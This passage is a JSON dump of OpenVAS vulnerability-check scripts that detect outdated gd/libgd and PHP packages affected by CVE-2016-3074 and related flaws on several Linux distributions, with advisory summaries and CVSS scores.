rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgd2-xpm-dev:amd64\", ver:\"2.0.36~rc1~dfsg-6.1+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-05-08T00:00:00", "id": "OPENVAS:1361412562310807994", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807994", "type": "openvas", "title": "Fedora Update for gd FEDORA-2016-0", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gd FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# 
Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807994\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:18:34 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gd FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gd on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-May/183724.html\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.1.1~7.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-05-06T00:00:00", "id": "OPENVAS:1361412562310807957", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807957", "type": "openvas", "title": "Fedora Update for gd FEDORA-2016-5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for gd FEDORA-2016-5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807957\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-06 15:29:14 +0530 (Fri, 06 May 2016)\");\n script_cve_id(\"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for gd FEDORA-2016-5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'gd'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"gd on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183263.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n 
exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.1.1~5.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9933", "CVE-2016-6161", "CVE-2016-3074", "CVE-2017-6362"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192583", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for gd (EulerOS-SA-2019-2583)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2583\");\n script_version(\"2020-01-23T13:07:27+0000\");\n script_cve_id(\"CVE-2016-3074\", \"CVE-2016-6161\", \"CVE-2016-9933\", \"CVE-2017-6362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:07:27 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:07:27 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for gd (EulerOS-SA-2019-2583)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2583\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2583\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'gd' package(s) announced via the EulerOS-SA-2019-2583 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based 
buffer overflow.(CVE-2016-3074)\n\nThe output function in gd_gif_out.c in the GD Graphics Library (aka libgd) allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted image.(CVE-2016-6161)\n\nStack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.(CVE-2016-9933)\n\nDouble free vulnerability in the gdImagePngPtr function in libgd2 before 2.2.5 allows remote attackers to cause a denial of service via vectors related to a palette with no colors.(CVE-2017-6362)\");\n\n script_tag(name:\"affected\", value:\"'gd' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"gd\", rpm:\"gd~2.0.35~26.h8\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9709", "CVE-2015-8877", "CVE-2015-8874", "CVE-2016-3074", "CVE-2014-2497"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-06-01T00:00:00", "id": "OPENVAS:1361412562310842778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842778", 
"type": "openvas", "title": "Ubuntu Update for libgd2 USN-2987-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for libgd2 USN-2987-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842778\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-01 05:24:20 +0200 (Wed, 01 Jun 2016)\");\n script_cve_id(\"CVE-2014-2497\", \"CVE-2014-9709\", \"CVE-2015-8874\", \"CVE-2015-8877\", \"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for libgd2 USN-2987-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libgd2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the GD library\n incorrectly handled certain color tables in XPM images. If a user or automated\n system were tricked into processing a specially crafted XPM image, an attacker\n could cause a denial of service. This issue only affected Ubuntu 12.04 LTS and\n Ubuntu 14.04 LTS. (CVE-2014-2497)\n\n It was discovered that the GD library incorrectly handled certain malformed\n GIF images. If a user or automated system were tricked into processing a\n specially crafted GIF image, an attacker could cause a denial of service.\n This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n (CVE-2014-9709)\n\n It was discovered that the GD library incorrectly handled memory when using\n gdImageFillToBorder(). A remote attacker could possibly use this issue to\n cause a denial of service. (CVE-2015-8874)\n\n It was discovered that the GD library incorrectly handled memory when using\n gdImageScaleTwoPass(). A remote attacker could possibly use this issue to\n cause a denial of service. This issue only applied to Ubuntu 14.04 LTS,\n Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)\n\n Hans Jerry Illikainen discovered that the GD library incorrectly handled\n certain malformed GD images. If a user or automated system were tricked\n into processing a specially crafted GD image, an attacker could cause a\n denial of service or possibly execute arbitrary code. 
(CVE-2016-3074)\");\n script_tag(name:\"affected\", value:\"libgd2 on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2987-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2987-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.0-3ubuntu0.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.0-3ubuntu0.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd2-noxpm:amd64\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd2-noxpm:i386\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd2-xpm:i386\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd2-xpm:amd64\", ver:\"2.0.36~rc1~dfsg-6ubuntu2.1\", 
rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.1-4ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.1-4ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libgd3:amd64\", ver:\"2.1.1-4ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgd3:i386\", ver:\"2.1.1-4ubuntu0.15.10.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:56:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8865", "CVE-2016-4070", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4072", "CVE-2016-4071"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-05-09T00:00:00", "id": "OPENVAS:1361412562310120687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120687", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-698)", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, 
or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120687\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:12:03 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-698)\");\n script_tag(name:\"insight\", value:\"The following security-related issues were resolved:Buffer over-write in finfo_open with malformed magic file (CVE-2015-8865 )Signedness vulnerability causing heap overflow in libgd (CVE-2016-3074 )Integer overflow in php_raw_url_encode (CVE-2016-4070 )Format string vulnerability in php_snmp_error() (CVE-2016-4071 )Invalid memory write in phar on filename containing \\\\0 inside name (CVE-2016-4072 )Negative size parameter in memcpy (CVE-2016-4073 )\");\n script_tag(name:\"solution\", value:\"Run yum update php56 to update your system.\n\n Run yum update php55 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-698.html\");\n script_cve_id(\"CVE-2015-8865\", \"CVE-2016-4073\", \"CVE-2016-4072\", \"CVE-2016-4071\", \"CVE-2016-4070\", \"CVE-2016-3074\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php55-mbstring\", rpm:\"php55-mbstring~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-intl\", rpm:\"php55-intl~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-tidy\", rpm:\"php55-tidy~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pdo\", rpm:\"php55-pdo~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-enchant\", rpm:\"php55-enchant~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mcrypt\", rpm:\"php55-mcrypt~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-xmlrpc\", rpm:\"php55-xmlrpc~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pspell\", rpm:\"php55-pspell~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-snmp\", rpm:\"php55-snmp~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-debuginfo\", rpm:\"php55-debuginfo~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php55-xml\", rpm:\"php55-xml~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-embedded\", rpm:\"php55-embedded~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gd\", rpm:\"php55-gd~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55\", rpm:\"php55~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-gmp\", rpm:\"php55-gmp~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-recode\", rpm:\"php55-recode~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-cli\", rpm:\"php55-cli~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-devel\", rpm:\"php55-devel~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-common\", rpm:\"php55-common~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mssql\", rpm:\"php55-mssql~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-dba\", rpm:\"php55-dba~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-bcmath\", rpm:\"php55-bcmath~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-pgsql\", rpm:\"php55-pgsql~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-fpm\", rpm:\"php55-fpm~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-opcache\", rpm:\"php55-opcache~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"php55-imap\", rpm:\"php55-imap~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-mysqlnd\", rpm:\"php55-mysqlnd~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-odbc\", rpm:\"php55-odbc~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-process\", rpm:\"php55-process~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-soap\", rpm:\"php55-soap~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php55-ldap\", rpm:\"php55-ldap~5.5.35~1.114.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.21~1.124.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n 
